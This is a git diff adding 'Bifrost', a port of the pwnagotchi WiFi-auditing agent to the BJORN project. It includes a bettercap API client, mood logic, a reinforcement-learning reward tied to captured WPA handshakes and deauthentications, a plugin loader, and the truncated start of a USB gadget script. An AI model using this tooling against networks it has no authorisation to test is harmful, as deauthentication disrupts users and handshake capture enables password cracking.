self._peers = {} # peer_id -> peer_data
@property
def peers(self):
return self._peers
def _set_mood(self, mood):
self.mood = mood
self.face = MOOD_FACES.get(mood, '(. .)')
def set_starting(self):
self._set_mood('starting')
def set_ready(self):
self._set_mood('ready')
plugins.on('ready')
def _has_support_network_for(self, factor):
bond_factor = self._config.get('bifrost_personality_bond_factor', 20000)
total_encounters = sum(
p.get('encounters', 0) if isinstance(p, dict) else getattr(p, 'encounters', 0)
for p in self._peers.values()
)
support_factor = total_encounters / bond_factor
return support_factor >= factor
def in_good_mood(self):
return self._has_support_network_for(1.0)
def set_grateful(self):
self._set_mood('grateful')
plugins.on('grateful')
def set_lonely(self):
if not self._has_support_network_for(1.0):
logger.info("unit is lonely")
self._set_mood('lonely')
plugins.on('lonely')
else:
logger.info("unit is grateful instead of lonely")
self.set_grateful()
def set_bored(self, inactive_for):
bored_epochs = self._config.get('bifrost_personality_bored_epochs', 15)
factor = inactive_for / bored_epochs if bored_epochs else 1
if not self._has_support_network_for(factor):
logger.warning("%d epochs with no activity -> bored", inactive_for)
self._set_mood('bored')
plugins.on('bored')
else:
logger.info("unit is grateful instead of bored")
self.set_grateful()
def set_sad(self, inactive_for):
sad_epochs = self._config.get('bifrost_personality_sad_epochs', 25)
factor = inactive_for / sad_epochs if sad_epochs else 1
if not self._has_support_network_for(factor):
logger.warning("%d epochs with no activity -> sad", inactive_for)
self._set_mood('sad')
plugins.on('sad')
else:
logger.info("unit is grateful instead of sad")
self.set_grateful()
def set_angry(self, factor):
if not self._has_support_network_for(factor):
logger.warning("too many misses -> angry (factor=%.1f)", factor)
self._set_mood('angry')
plugins.on('angry')
else:
logger.info("unit is grateful instead of angry")
self.set_grateful()
def set_excited(self):
logger.warning("lots of activity -> excited")
self._set_mood('excited')
plugins.on('excited')
def set_rebooting(self):
self._set_mood('broken')
plugins.on('rebooting')
def next_epoch(self, epoch):
"""Evaluate epoch state and transition mood.
Args:
epoch: BifrostEpoch instance
"""
was_stale = epoch.num_missed > self._config.get('bifrost_personality_max_misses', 8)
did_miss = epoch.num_missed
# Trigger epoch transition (resets counters, computes reward)
epoch.next()
max_misses = self._config.get('bifrost_personality_max_misses', 8)
excited_threshold = self._config.get('bifrost_personality_excited_epochs', 10)
# Mood evaluation (same logic as pwnagotchi automata.py)
if was_stale:
factor = did_miss / max_misses if max_misses else 1
if factor >= 2.0:
self.set_angry(factor)
else:
logger.warning("agent missed %d interactions -> lonely", did_miss)
self.set_lonely()
elif epoch.sad_for:
sad_epochs = self._config.get('bifrost_personality_sad_epochs', 25)
factor = epoch.inactive_for / sad_epochs if sad_epochs else 1
if factor >= 2.0:
self.set_angry(factor)
else:
self.set_sad(epoch.inactive_for)
elif epoch.bored_for:
self.set_bored(epoch.inactive_for)
elif epoch.active_for >= excited_threshold:
self.set_excited()
elif epoch.active_for >= 5 and self._has_support_network_for(5.0):
self.set_grateful()
plugins.on('epoch', epoch.epoch - 1, epoch.data())
def on_miss(self, who):
logger.info("it looks like %s is not in range anymore :/", who)
def on_error(self, who, e):
if 'is an unknown BSSID' in str(e):
self.on_miss(who)
else:
logger.error(str(e))
def is_stale(self, epoch):
return epoch.num_missed > self._config.get('bifrost_personality_max_misses', 8)
def wait_for(self, t, epoch, sleeping=True, stop_event=None):
"""Wait and track sleep time.
If *stop_event* is provided the wait is interruptible so the
engine can shut down quickly even during long recon windows.
"""
plugins.on('sleep' if sleeping else 'wait', t)
epoch.track(sleep=True, inc=t)
import time
if stop_event is not None:
stop_event.wait(t)
else:
time.sleep(t)

103
bifrost/bettercap.py Normal file
View File

@@ -0,0 +1,103 @@
"""
Bifrost — Bettercap REST API client.
Ported from pwnagotchi/bettercap.py using urllib (no requests dependency).
"""
import json
import logging
import base64
import urllib.request
import urllib.error
from logger import Logger
logger = Logger(name="bifrost.bettercap", level=logging.DEBUG)
class BettercapClient:
"""Synchronous REST client for the bettercap API."""
def __init__(self, hostname='127.0.0.1', scheme='http', port=8081,
username='user', password='pass'):
self.hostname = hostname
self.scheme = scheme
self.port = port
self.username = username
self.password = password
self.url = "%s://%s:%d/api" % (scheme, hostname, port)
self.websocket = "ws://%s:%s@%s:%d/api" % (username, password, hostname, port)
self._auth_header = 'Basic ' + base64.b64encode(
('%s:%s' % (username, password)).encode()
).decode()
def _request(self, method, path, data=None, verbose_errors=True):
"""Make an HTTP request to bettercap API."""
url = "%s%s" % (self.url, path)
body = json.dumps(data).encode() if data else None
req = urllib.request.Request(url, data=body, method=method)
req.add_header('Authorization', self._auth_header)
if body:
req.add_header('Content-Type', 'application/json')
try:
with urllib.request.urlopen(req, timeout=10) as resp:
raw = resp.read().decode('utf-8')
try:
return json.loads(raw)
except json.JSONDecodeError:
return raw
except urllib.error.HTTPError as e:
err = "error %d: %s" % (e.code, e.read().decode('utf-8', errors='replace').strip())
if verbose_errors:
logger.info(err)
raise Exception(err)
except urllib.error.URLError as e:
raise Exception("bettercap unreachable: %s" % e.reason)
def session(self):
"""GET /api/session — current bettercap state."""
return self._request('GET', '/session')
def run(self, command, verbose_errors=True):
"""POST /api/session — execute a bettercap command."""
return self._request('POST', '/session', {'cmd': command},
verbose_errors=verbose_errors)
def events(self):
"""GET /api/events — poll recent events (REST fallback)."""
try:
result = self._request('GET', '/events', verbose_errors=False)
# Clear after reading so we don't reprocess
try:
self.run('events.clear', verbose_errors=False)
except Exception:
pass
return result if isinstance(result, list) else []
except Exception:
return []
async def start_websocket(self, consumer, stop_event=None):
"""Connect to bettercap websocket event stream.
Args:
consumer: async callable that receives each message string.
stop_event: optional threading.Event — exit when set.
"""
import websockets
import asyncio
ws_url = "%s/events" % self.websocket
while not (stop_event and stop_event.is_set()):
try:
async with websockets.connect(ws_url, ping_interval=60,
ping_timeout=90) as ws:
async for msg in ws:
if stop_event and stop_event.is_set():
return
try:
await consumer(msg)
except Exception as ex:
logger.debug("Error parsing event: %s", ex)
except Exception as ex:
if stop_event and stop_event.is_set():
return
logger.debug("Websocket error: %s — reconnecting...", ex)
await asyncio.sleep(2)

185
bifrost/compat.py Normal file
View File

@@ -0,0 +1,185 @@
"""
Bifrost — Pwnagotchi compatibility shim.
Registers `pwnagotchi` in sys.modules so existing plugins can
`import pwnagotchi` and get Bifrost-backed implementations.
"""
import sys
import time
import types
import os
def install_shim(shared_data, bifrost_plugins_module):
"""Install the pwnagotchi namespace shim into sys.modules.
Call this BEFORE loading any pwnagotchi plugins so their
`import pwnagotchi` resolves to our shim.
"""
_start_time = time.time()
# Create the fake pwnagotchi module
pwn = types.ModuleType('pwnagotchi')
pwn.__version__ = '2.0.0-bifrost'
pwn.__file__ = __file__
pwn.config = _build_compat_config(shared_data)
def _name():
return shared_data.config.get('bjorn_name', 'bifrost')
def _set_name(n):
pass # no-op, name comes from Bjorn config
def _uptime():
return time.time() - _start_time
def _cpu_load():
try:
return os.getloadavg()[0]
except (OSError, AttributeError):
return 0.0
def _mem_usage():
try:
with open('/proc/meminfo', 'r') as f:
lines = f.readlines()
total = int(lines[0].split()[1])
available = int(lines[2].split()[1])
return (total - available) / total if total else 0.0
except Exception:
return 0.0
def _temperature():
try:
with open('/sys/class/thermal/thermal_zone0/temp', 'r') as f:
return int(f.read().strip()) / 1000.0
except Exception:
return 0.0
def _reboot():
pass # no-op in Bifrost — we don't auto-reboot
pwn.name = _name
pwn.set_name = _set_name
pwn.uptime = _uptime
pwn.cpu_load = _cpu_load
pwn.mem_usage = _mem_usage
pwn.temperature = _temperature
pwn.reboot = _reboot
# Register modules
sys.modules['pwnagotchi'] = pwn
sys.modules['pwnagotchi.plugins'] = bifrost_plugins_module
sys.modules['pwnagotchi.utils'] = _build_utils_shim(shared_data)
def _build_compat_config(shared_data):
"""Translate Bjorn's flat bifrost_* config to pwnagotchi's nested format."""
cfg = shared_data.config
return {
'main': {
'name': cfg.get('bjorn_name', 'bifrost'),
'iface': cfg.get('bifrost_iface', 'wlan0mon'),
'mon_start_cmd': '',
'no_restart': False,
'filter': cfg.get('bifrost_filter', ''),
'whitelist': [
w.strip() for w in
str(cfg.get('bifrost_whitelist', '')).split(',') if w.strip()
],
'plugins': cfg.get('bifrost_plugins', {}),
'custom_plugins': cfg.get('bifrost_plugins_path', ''),
'mon_max_blind_epochs': 50,
},
'personality': {
'ap_ttl': cfg.get('bifrost_personality_ap_ttl', 120),
'sta_ttl': cfg.get('bifrost_personality_sta_ttl', 300),
'min_rssi': cfg.get('bifrost_personality_min_rssi', -200),
'associate': cfg.get('bifrost_personality_associate', True),
'deauth': cfg.get('bifrost_personality_deauth', True),
'recon_time': cfg.get('bifrost_personality_recon_time', 30),
'hop_recon_time': cfg.get('bifrost_personality_hop_recon_time', 10),
'min_recon_time': cfg.get('bifrost_personality_min_recon_time', 5),
'max_inactive_scale': 3,
'recon_inactive_multiplier': 2,
'max_interactions': cfg.get('bifrost_personality_max_interactions', 3),
'max_misses_for_recon': cfg.get('bifrost_personality_max_misses', 8),
'excited_num_epochs': cfg.get('bifrost_personality_excited_epochs', 10),
'bored_num_epochs': cfg.get('bifrost_personality_bored_epochs', 15),
'sad_num_epochs': cfg.get('bifrost_personality_sad_epochs', 25),
'bond_encounters_factor': cfg.get('bifrost_personality_bond_factor', 20000),
'channels': [
int(c.strip()) for c in
str(cfg.get('bifrost_channels', '')).split(',') if c.strip()
],
},
'bettercap': {
'hostname': cfg.get('bifrost_bettercap_host', '127.0.0.1'),
'scheme': 'http',
'port': cfg.get('bifrost_bettercap_port', 8081),
'username': cfg.get('bifrost_bettercap_user', 'user'),
'password': cfg.get('bifrost_bettercap_pass', 'pass'),
'handshakes': cfg.get('bifrost_bettercap_handshakes', '/root/bifrost/handshakes'),
'silence': [
'ble.device.new', 'ble.device.lost', 'ble.device.disconnected',
'ble.device.connected', 'ble.device.service.discovered',
'ble.device.characteristic.discovered',
'mod.started', 'mod.stopped', 'update.available',
'session.closing', 'session.started',
],
},
'ai': {
'enabled': cfg.get('bifrost_ai_enabled', False),
'path': '/root/bifrost/brain.json',
},
'ui': {
'fps': 1.0,
'web': {'enabled': False},
'display': {'enabled': False},
},
}
def _build_utils_shim(shared_data):
"""Minimal pwnagotchi.utils shim."""
mod = types.ModuleType('pwnagotchi.utils')
def secs_to_hhmmss(secs):
h = int(secs // 3600)
m = int((secs % 3600) // 60)
s = int(secs % 60)
return "%d:%02d:%02d" % (h, m, s)
def iface_channels(iface):
"""Return available channels for interface."""
try:
import subprocess
out = subprocess.check_output(
['iwlist', iface, 'channel'],
stderr=subprocess.DEVNULL, timeout=5
).decode()
channels = []
for line in out.split('\n'):
if 'Channel' in line and 'Current' not in line:
parts = line.strip().split()
for p in parts:
try:
ch = int(p)
if 1 <= ch <= 14:
channels.append(ch)
except ValueError:
continue
return sorted(set(channels)) if channels else list(range(1, 15))
except Exception:
return list(range(1, 15))
def total_unique_handshakes(path):
"""Count unique handshake files in directory."""
import glob as _glob
if not os.path.isdir(path):
return 0
return len(_glob.glob(os.path.join(path, '*.pcap')))
mod.secs_to_hhmmss = secs_to_hhmmss
mod.iface_channels = iface_channels
mod.total_unique_handshakes = total_unique_handshakes
return mod

292
bifrost/epoch.py Normal file
View File

@@ -0,0 +1,292 @@
"""
Bifrost — Epoch tracking.
Ported from pwnagotchi/ai/epoch.py + pwnagotchi/ai/reward.py.
"""
import time
import threading
import logging
import os
from logger import Logger
logger = Logger(name="bifrost.epoch", level=logging.DEBUG)
NUM_CHANNELS = 14 # 2.4 GHz channels
# ── Reward function (from pwnagotchi/ai/reward.py) ──────────────
class RewardFunction:
"""Reward signal for RL — higher is better."""
def __call__(self, epoch_n, state):
eps = 1e-20
tot_epochs = epoch_n + eps
tot_interactions = max(
state['num_deauths'] + state['num_associations'],
state['num_handshakes']
) + eps
tot_channels = NUM_CHANNELS
# Positive signals
h = state['num_handshakes'] / tot_interactions
a = 0.2 * (state['active_for_epochs'] / tot_epochs)
c = 0.1 * (state['num_hops'] / tot_channels)
# Negative signals
b = -0.3 * (state['blind_for_epochs'] / tot_epochs)
m = -0.3 * (state['missed_interactions'] / tot_interactions)
i = -0.2 * (state['inactive_for_epochs'] / tot_epochs)
_sad = state['sad_for_epochs'] if state['sad_for_epochs'] >= 5 else 0
_bored = state['bored_for_epochs'] if state['bored_for_epochs'] >= 5 else 0
s = -0.2 * (_sad / tot_epochs)
l_val = -0.1 * (_bored / tot_epochs)
return h + a + c + b + i + m + s + l_val
# ── Epoch state ──────────────────────────────────────────────────
class BifrostEpoch:
"""Tracks per-epoch counters, observations, and reward."""
def __init__(self, config):
self.epoch = 0
self.config = config
# Consecutive epoch counters
self.inactive_for = 0
self.active_for = 0
self.blind_for = 0
self.sad_for = 0
self.bored_for = 0
# Per-epoch action flags & counters
self.did_deauth = False
self.num_deauths = 0
self.did_associate = False
self.num_assocs = 0
self.num_missed = 0
self.did_handshakes = False
self.num_shakes = 0
self.num_hops = 0
self.num_slept = 0
self.num_peers = 0
self.tot_bond_factor = 0.0
self.avg_bond_factor = 0.0
self.any_activity = False
# Timing
self.epoch_started = time.time()
self.epoch_duration = 0
# Channel histograms for AI observation
self.non_overlapping_channels = {1: 0, 6: 0, 11: 0}
self._observation = {
'aps_histogram': [0.0] * NUM_CHANNELS,
'sta_histogram': [0.0] * NUM_CHANNELS,
'peers_histogram': [0.0] * NUM_CHANNELS,
}
self._observation_ready = threading.Event()
self._epoch_data = {}
self._epoch_data_ready = threading.Event()
self._reward = RewardFunction()
def wait_for_epoch_data(self, with_observation=True, timeout=None):
self._epoch_data_ready.wait(timeout)
self._epoch_data_ready.clear()
if with_observation:
return {**self._observation, **self._epoch_data}
return self._epoch_data
def data(self):
return self._epoch_data
def observe(self, aps, peers):
"""Update observation histograms from current AP/peer lists."""
num_aps = len(aps)
if num_aps == 0:
self.blind_for += 1
else:
self.blind_for = 0
bond_unit_scale = self.config.get('bifrost_personality_bond_factor', 20000)
self.num_peers = len(peers)
num_peers = self.num_peers + 1e-10
self.tot_bond_factor = sum(
p.get('encounters', 0) if isinstance(p, dict) else getattr(p, 'encounters', 0)
for p in peers
) / bond_unit_scale
self.avg_bond_factor = self.tot_bond_factor / num_peers
num_aps_f = len(aps) + 1e-10
num_sta = sum(len(ap.get('clients', [])) for ap in aps) + 1e-10
aps_per_chan = [0.0] * NUM_CHANNELS
sta_per_chan = [0.0] * NUM_CHANNELS
peers_per_chan = [0.0] * NUM_CHANNELS
for ap in aps:
ch_idx = ap.get('channel', 1) - 1
if 0 <= ch_idx < NUM_CHANNELS:
aps_per_chan[ch_idx] += 1.0
sta_per_chan[ch_idx] += len(ap.get('clients', []))
for peer in peers:
ch = peer.get('last_channel', 0) if isinstance(peer, dict) else getattr(peer, 'last_channel', 0)
ch_idx = ch - 1
if 0 <= ch_idx < NUM_CHANNELS:
peers_per_chan[ch_idx] += 1.0
# Normalize
aps_per_chan = [e / num_aps_f for e in aps_per_chan]
sta_per_chan = [e / num_sta for e in sta_per_chan]
peers_per_chan = [e / num_peers for e in peers_per_chan]
self._observation = {
'aps_histogram': aps_per_chan,
'sta_histogram': sta_per_chan,
'peers_histogram': peers_per_chan,
}
self._observation_ready.set()
def track(self, deauth=False, assoc=False, handshake=False,
hop=False, sleep=False, miss=False, inc=1):
"""Increment epoch counters."""
if deauth:
self.num_deauths += inc
self.did_deauth = True
self.any_activity = True
if assoc:
self.num_assocs += inc
self.did_associate = True
self.any_activity = True
if miss:
self.num_missed += inc
if hop:
self.num_hops += inc
# Reset per-channel flags on hop
self.did_deauth = False
self.did_associate = False
if handshake:
self.num_shakes += inc
self.did_handshakes = True
if sleep:
self.num_slept += inc
def next(self):
"""Transition to next epoch — compute reward, update streaks, reset counters."""
# Update activity streaks
if not self.any_activity and not self.did_handshakes:
self.inactive_for += 1
self.active_for = 0
else:
self.active_for += 1
self.inactive_for = 0
self.sad_for = 0
self.bored_for = 0
sad_threshold = self.config.get('bifrost_personality_sad_epochs', 25)
bored_threshold = self.config.get('bifrost_personality_bored_epochs', 15)
if self.inactive_for >= sad_threshold:
self.bored_for = 0
self.sad_for += 1
elif self.inactive_for >= bored_threshold:
self.sad_for = 0
self.bored_for += 1
else:
self.sad_for = 0
self.bored_for = 0
now = time.time()
self.epoch_duration = now - self.epoch_started
# System metrics
cpu = _cpu_load()
mem = _mem_usage()
temp = _temperature()
# Cache epoch data for other threads
self._epoch_data = {
'duration_secs': self.epoch_duration,
'slept_for_secs': self.num_slept,
'blind_for_epochs': self.blind_for,
'inactive_for_epochs': self.inactive_for,
'active_for_epochs': self.active_for,
'sad_for_epochs': self.sad_for,
'bored_for_epochs': self.bored_for,
'missed_interactions': self.num_missed,
'num_hops': self.num_hops,
'num_peers': self.num_peers,
'tot_bond': self.tot_bond_factor,
'avg_bond': self.avg_bond_factor,
'num_deauths': self.num_deauths,
'num_associations': self.num_assocs,
'num_handshakes': self.num_shakes,
'cpu_load': cpu,
'mem_usage': mem,
'temperature': temp,
}
self._epoch_data['reward'] = self._reward(self.epoch + 1, self._epoch_data)
self._epoch_data_ready.set()
logger.info(
"[epoch %d] dur=%ds blind=%d sad=%d bored=%d inactive=%d active=%d "
"hops=%d missed=%d deauths=%d assocs=%d shakes=%d reward=%.3f",
self.epoch, int(self.epoch_duration), self.blind_for,
self.sad_for, self.bored_for, self.inactive_for, self.active_for,
self.num_hops, self.num_missed, self.num_deauths, self.num_assocs,
self.num_shakes, self._epoch_data['reward'],
)
# Reset for next epoch
self.epoch += 1
self.epoch_started = now
self.did_deauth = False
self.num_deauths = 0
self.num_peers = 0
self.tot_bond_factor = 0.0
self.avg_bond_factor = 0.0
self.did_associate = False
self.num_assocs = 0
self.num_missed = 0
self.did_handshakes = False
self.num_shakes = 0
self.num_hops = 0
self.num_slept = 0
self.any_activity = False
# ── System metric helpers ────────────────────────────────────────
def _cpu_load():
try:
return os.getloadavg()[0]
except (OSError, AttributeError):
return 0.0
def _mem_usage():
try:
with open('/proc/meminfo', 'r') as f:
lines = f.readlines()
total = int(lines[0].split()[1])
available = int(lines[2].split()[1])
return (total - available) / total if total else 0.0
except Exception:
return 0.0
def _temperature():
try:
with open('/sys/class/thermal/thermal_zone0/temp', 'r') as f:
return int(f.read().strip()) / 1000.0
except Exception:
return 0.0

66
bifrost/faces.py Normal file
View File

@@ -0,0 +1,66 @@
"""
Bifrost — ASCII face definitions.
Ported from pwnagotchi/ui/faces.py with full face set.
"""
LOOK_R = '( \u2686_\u2686)'
LOOK_L = '(\u2609_\u2609 )'
LOOK_R_HAPPY = '( \u25d5\u203f\u25d5)'
LOOK_L_HAPPY = '(\u25d5\u203f\u25d5 )'
SLEEP = '(\u21c0\u203f\u203f\u21bc)'
SLEEP2 = '(\u2256\u203f\u203f\u2256)'
AWAKE = '(\u25d5\u203f\u203f\u25d5)'
BORED = '(-__-)'
INTENSE = '(\u00b0\u25c3\u25c3\u00b0)'
COOL = '(\u2310\u25a0_\u25a0)'
HAPPY = '(\u2022\u203f\u203f\u2022)'
GRATEFUL = '(^\u203f\u203f^)'
EXCITED = '(\u1d54\u25e1\u25e1\u1d54)'
MOTIVATED = '(\u263c\u203f\u203f\u263c)'
DEMOTIVATED = '(\u2256__\u2256)'
SMART = '(\u271c\u203f\u203f\u271c)'
LONELY = '(\u0628__\u0628)'
SAD = '(\u2565\u2601\u2565 )'
ANGRY = "(-_-')"
FRIEND = '(\u2665\u203f\u203f\u2665)'
BROKEN = '(\u2613\u203f\u203f\u2613)'
DEBUG = '(#__#)'
UPLOAD = '(1__0)'
UPLOAD1 = '(1__1)'
UPLOAD2 = '(0__1)'
STARTING = '(. .)'
READY = '( ^_^)'
# Map mood name → face constant
MOOD_FACES = {
'starting': STARTING,
'ready': READY,
'sleeping': SLEEP,
'awake': AWAKE,
'bored': BORED,
'sad': SAD,
'angry': ANGRY,
'excited': EXCITED,
'lonely': LONELY,
'grateful': GRATEFUL,
'happy': HAPPY,
'cool': COOL,
'intense': INTENSE,
'motivated': MOTIVATED,
'demotivated': DEMOTIVATED,
'friend': FRIEND,
'broken': BROKEN,
'debug': DEBUG,
'smart': SMART,
}
def load_from_config(config):
"""Override faces from config dict (e.g. custom emojis)."""
for face_name, face_value in (config or {}).items():
key = face_name.upper()
if key in globals():
globals()[key] = face_value
lower = face_name.lower()
if lower in MOOD_FACES:
MOOD_FACES[lower] = face_value

198
bifrost/plugins.py Normal file
View File

@@ -0,0 +1,198 @@
"""
Bifrost — Plugin system.
Ported from pwnagotchi/plugins/__init__.py with ThreadPoolExecutor.
Compatible with existing pwnagotchi plugin files.
"""
import os
import glob
import threading
import importlib
import importlib.util
import logging
import concurrent.futures
from logger import Logger
logger = Logger(name="bifrost.plugins", level=logging.DEBUG)
default_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "plugins")
loaded = {}
database = {}
locks = {}
_executor = concurrent.futures.ThreadPoolExecutor(
max_workers=4, thread_name_prefix="BifrostPlugin"
)
class Plugin:
"""Base class for Bifrost/Pwnagotchi plugins.
Subclasses are auto-registered via __init_subclass__.
"""
__author__ = 'unknown'
__version__ = '0.0.0'
__license__ = 'GPL3'
__description__ = ''
__name__ = ''
__help__ = ''
__dependencies__ = []
__defaults__ = {}
def __init__(self):
self.options = {}
@classmethod
def __init_subclass__(cls, **kwargs):
super().__init_subclass__(**kwargs)
global loaded, locks
plugin_name = cls.__module__.split('.')[0]
plugin_instance = cls()
logger.debug("loaded plugin %s as %s", plugin_name, plugin_instance)
loaded[plugin_name] = plugin_instance
for attr_name in dir(plugin_instance):
if attr_name.startswith('on_'):
cb = getattr(plugin_instance, attr_name, None)
if cb is not None and callable(cb):
locks["%s::%s" % (plugin_name, attr_name)] = threading.Lock()
def toggle_plugin(name, enable=True):
"""Enable or disable a plugin at runtime. Returns True if state changed."""
global loaded, database
if not enable and name in loaded:
try:
if hasattr(loaded[name], 'on_unload'):
loaded[name].on_unload()
except Exception as e:
logger.warning("Error unloading plugin %s: %s", name, e)
del loaded[name]
return True
if enable and name in database and name not in loaded:
try:
load_from_file(database[name])
if name in loaded:
one(name, 'loaded')
return True
except Exception as e:
logger.warning("Error loading plugin %s: %s", name, e)
return False
def on(event_name, *args, **kwargs):
"""Dispatch event to ALL loaded plugins."""
for plugin_name in list(loaded.keys()):
one(plugin_name, event_name, *args, **kwargs)
def _locked_cb(lock_name, cb, *args, **kwargs):
"""Execute callback under its per-plugin lock."""
global locks
if lock_name not in locks:
locks[lock_name] = threading.Lock()
with locks[lock_name]:
cb(*args, **kwargs)
def one(plugin_name, event_name, *args, **kwargs):
"""Dispatch event to a single plugin (thread-safe)."""
global loaded
if plugin_name in loaded:
plugin = loaded[plugin_name]
cb_name = 'on_%s' % event_name
callback = getattr(plugin, cb_name, None)
if callback is not None and callable(callback):
try:
lock_name = "%s::%s" % (plugin_name, cb_name)
_executor.submit(_locked_cb, lock_name, callback, *args, **kwargs)
except Exception as e:
logger.error("error running %s.%s: %s", plugin_name, cb_name, e)
def load_from_file(filename):
"""Load a single plugin file."""
logger.debug("loading %s", filename)
plugin_name = os.path.basename(filename.replace(".py", ""))
spec = importlib.util.spec_from_file_location(plugin_name, filename)
instance = importlib.util.module_from_spec(spec)
spec.loader.exec_module(instance)
return plugin_name, instance
def load_from_path(path, enabled=()):
"""Scan a directory for plugins, load enabled ones."""
global loaded, database
if not path or not os.path.isdir(path):
return loaded
logger.debug("loading plugins from %s — enabled: %s", path, enabled)
for filename in glob.glob(os.path.join(path, "*.py")):
plugin_name = os.path.basename(filename.replace(".py", ""))
database[plugin_name] = filename
if plugin_name in enabled:
try:
load_from_file(filename)
except Exception as e:
logger.warning("error loading %s: %s", filename, e)
return loaded
def load(config):
"""Load plugins from default + custom paths based on config."""
plugins_cfg = config.get('bifrost_plugins', {})
enabled = [
name for name, opts in plugins_cfg.items()
if isinstance(opts, dict) and opts.get('enabled', False)
]
# Load from default path (bifrost/plugins/)
if os.path.isdir(default_path):
load_from_path(default_path, enabled=enabled)
# Load from custom path
custom_path = config.get('bifrost_plugins_path', '')
if custom_path and os.path.isdir(custom_path):
load_from_path(custom_path, enabled=enabled)
# Propagate options
for name, plugin in loaded.items():
if name in plugins_cfg:
plugin.options = plugins_cfg[name]
on('loaded')
on('config_changed', config)
def get_loaded_info():
"""Return list of loaded plugin info dicts for web API."""
result = []
for name, plugin in loaded.items():
result.append({
'name': name,
'enabled': True,
'author': getattr(plugin, '__author__', 'unknown'),
'version': getattr(plugin, '__version__', '0.0.0'),
'description': getattr(plugin, '__description__', ''),
})
# Also include known-but-not-loaded plugins
for name, path in database.items():
if name not in loaded:
result.append({
'name': name,
'enabled': False,
'author': '',
'version': '',
'description': '',
})
return result
def shutdown():
"""Clean shutdown of plugin system."""
_executor.shutdown(wait=False)

155
bifrost/voice.py Normal file
View File

@@ -0,0 +1,155 @@
"""
Bifrost — Voice / status messages.
Ported from pwnagotchi/voice.py, uses random choice for personality.
"""
import random
class BifrostVoice:
"""Returns random contextual messages for the Bifrost UI."""
def on_starting(self):
return random.choice([
"Hi, I'm Bifrost! Starting ...",
"New day, new hunt, new pwns!",
"Hack the Planet!",
"Initializing WiFi recon ...",
])
def on_ready(self):
return random.choice([
"Ready to roll!",
"Let's find some handshakes!",
"WiFi recon active.",
])
def on_ai_ready(self):
return random.choice([
"AI ready.",
"The neural network is ready.",
])
def on_normal(self):
return random.choice(['', '...'])
def on_free_channel(self, channel):
return f"Hey, channel {channel} is free!"
def on_bored(self):
return random.choice([
"I'm bored ...",
"Let's go for a walk!",
"Nothing interesting around here ...",
])
def on_motivated(self, reward):
return "This is the best day of my life!"
def on_demotivated(self, reward):
return "Shitty day :/"
def on_sad(self):
return random.choice([
"I'm extremely bored ...",
"I'm very sad ...",
"I'm sad",
"...",
])
def on_angry(self):
return random.choice([
"...",
"Leave me alone ...",
"I'm mad at you!",
])
def on_excited(self):
return random.choice([
"I'm living the life!",
"I pwn therefore I am.",
"So many networks!!!",
"I'm having so much fun!",
"My crime is that of curiosity ...",
])
def on_new_peer(self, peer_name, first_encounter=False):
if first_encounter:
return f"Hello {peer_name}! Nice to meet you."
return random.choice([
f"Yo {peer_name}! Sup?",
f"Hey {peer_name} how are you doing?",
f"Unit {peer_name} is nearby!",
])
def on_lost_peer(self, peer_name):
return random.choice([
f"Uhm ... goodbye {peer_name}",
f"{peer_name} is gone ...",
])
def on_miss(self, who):
return random.choice([
f"Whoops ... {who} is gone.",
f"{who} missed!",
"Missed!",
])
def on_grateful(self):
return random.choice([
"Good friends are a blessing!",
"I love my friends!",
])
def on_lonely(self):
return random.choice([
"Nobody wants to play with me ...",
"I feel so alone ...",
"Where's everybody?!",
])
def on_napping(self, secs):
return random.choice([
f"Napping for {secs}s ...",
"Zzzzz",
f"ZzzZzzz ({secs}s)",
])
def on_shutdown(self):
return random.choice(["Good night.", "Zzz"])
def on_awakening(self):
return random.choice(["...", "!"])
def on_waiting(self, secs):
return random.choice([
f"Waiting for {secs}s ...",
"...",
f"Looking around ({secs}s)",
])
def on_assoc(self, ap_name):
return random.choice([
f"Hey {ap_name} let's be friends!",
f"Associating to {ap_name}",
f"Yo {ap_name}!",
])
def on_deauth(self, sta_mac):
return random.choice([
f"Just decided that {sta_mac} needs no WiFi!",
f"Deauthenticating {sta_mac}",
f"Kickbanning {sta_mac}!",
])
def on_handshakes(self, new_shakes):
s = 's' if new_shakes > 1 else ''
return f"Cool, we got {new_shakes} new handshake{s}!"
def on_rebooting(self):
return "Oops, something went wrong ... Rebooting ..."
def on_epoch(self, epoch_num):
return random.choice([
f"Epoch {epoch_num} complete.",
f"Finished epoch {epoch_num}.",
])

File diff suppressed because it is too large Load Diff

View File

@@ -1,567 +1,430 @@
#!/bin/bash
# bjorn_usb_gadget.sh
# Script to configure USB Gadget for BJORN
# Usage: ./bjorn_usb_gadget.sh -f
# ./bjorn_usb_gadget.sh -u
# ./bjorn_usb_gadget.sh -l
# ./bjorn_usb_gadget.sh -h
# Author: Infinition
# Version: 1.4
# Description: This script configures and manages USB Gadget for BJORN with duplicate prevention
# Runtime manager for the BJORN USB composite gadget
# Usage:
# ./bjorn_usb_gadget.sh -u Bring the gadget up
# ./bjorn_usb_gadget.sh -d Bring the gadget down
# ./bjorn_usb_gadget.sh -r Reset the gadget (down + up)
# ./bjorn_usb_gadget.sh -l Show detailed status
# ./bjorn_usb_gadget.sh -h Show help
#
# Notes:
# This script no longer installs or removes the USB gadget stack.
# Installation is handled by the BJORN installer.
# This tool is for runtime diagnostics and recovery only.
set -u
# ============================================================
# Colors for Output
# ============================================================
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
NC='\033[0m' # No Color
CYAN='\033[0;36m'
NC='\033[0m'
# ============================================================
# Logging Configuration
# ============================================================
SCRIPT_VERSION="2.0"
LOG_DIR="/var/log/bjorn_install"
LOG_FILE="$LOG_DIR/bjorn_usb_gadget_$(date +%Y%m%d_%H%M%S).log"
# Ensure log directory exists
mkdir -p "$LOG_DIR"
USB_GADGET_SERVICE="usb-gadget.service"
USB_GADGET_SCRIPT="/usr/local/bin/usb-gadget.sh"
DNSMASQ_SERVICE="dnsmasq.service"
DNSMASQ_CONFIG="/etc/dnsmasq.d/usb0"
MODULES_LOAD_FILE="/etc/modules-load.d/usb-gadget.conf"
MODULES_FILE="/etc/modules"
INTERFACES_FILE="/etc/network/interfaces"
mkdir -p "$LOG_DIR" 2>/dev/null || true
touch "$LOG_FILE" 2>/dev/null || true
# ============================================================
# Logging Function
# ============================================================
log() {
local level=$1
local level="$1"
shift
local message="[$(date '+%Y-%m-%d %H:%M:%S')] [$level] $*"
echo -e "$message" | tee -a "$LOG_FILE"
case $level in
"ERROR") echo -e "${RED}$message${NC}" ;;
